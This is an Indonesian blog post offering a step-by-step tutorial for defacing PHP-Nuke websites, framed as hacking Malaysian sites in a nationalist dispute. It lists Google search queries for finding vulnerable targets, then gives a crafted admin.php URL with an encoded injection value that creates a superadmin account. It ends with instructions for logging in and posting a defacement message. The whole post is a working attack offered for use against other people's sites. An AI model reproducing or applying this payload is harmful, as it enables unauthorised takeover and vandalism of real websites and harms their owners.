BERAWAL DARI KETERBATASAN,DAN MUNCUL DALAM KHAYALAN ALAM PIKIRAN DAN MENDORONG KEINGINAN YANG DIIKUTI DENGAN USAHA UNTUK MEWUJUDKANNYA.
JIKALAU KAU NANTI LEBIH TINGGI DARI RAJA NIKMATI HIDUP DENGAN BLANGKON DIKEPALA


Korek - Korek Disini

Selasa, 12 Januari 2010

langkah nya

Diposkan oleh Retro_Skater di 10:26
udah lama nih udah nda nge posting tentang hacking maklum lagi sibuk
cari dollar dan di sini saya akan menjelaskan berbagi macan jenis deface
yang skarang di pergunakan para hacked indo untuk hack website orang
malaysia untuk membela manohara....! (seperti emould.com.cn dan hacked by x-blank )

Deface situs php nuke
Buka situs www.google.com
kemudian ketik =>
allinurl:.com/nuke/index.php atau
allinurl:.org/nuke/index.php.
Nah ….. kalo udah ketemu targetnya maka langkah
selanjutnya adalah :
1. www.target.com/nuke/index.php
2. www.target.com/nuke/admin.php =>
index.php yg diatas tadi dirubah
menjadi admin.php
3. Masukkan bug ini di belakang situs tadi :
?op=AddAuthor&add_aid=budakbaonk&add_name=
God&add_pwd=bajingan&add_email=
sandal_karet@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox
misal : www.target.com/nuke/admin.php?
op=AddAuthor&add_aid=budakbaonk&add_name=
God&add_pwd=bajingan&add_email=
sandal_karet@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox
Kalo nggak mau berarti situs tsb udah di path ama admin nya.
Tapi kalo berhasil, maka di url/browsing lu muncul
www.target.com/nuke/admin.php?op=mod_author
5. Disana lu di suruh login, masukin id & password lu tadi.
Masih ingat kan ?
id=budakbaonk => liat yg diatas tadi
password=bajingan => liat yg diatas tadi
Nah lu skrg udah masuk ke “Administration Menu” situs tsb.
Berarti lu udah mengusai situs tsb skrg ! He he he he he
Skrg lu pilih gambar Handphone (dibawahnya ada tulisan Messages),
Kolom title =>

Kolom content =>

Kolom expiration => unlimited
trus klik tab add messages yg ada dibawah
Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi,
misal www.target.com/nuke atau www.target.com/nuke/index.php
kalo nggak ada hasil deface lu coba klik tab refresh yg ada
diatas yg disamping url/browsing lu

Tidak ada komentar:

Posting Komentar

Monggo..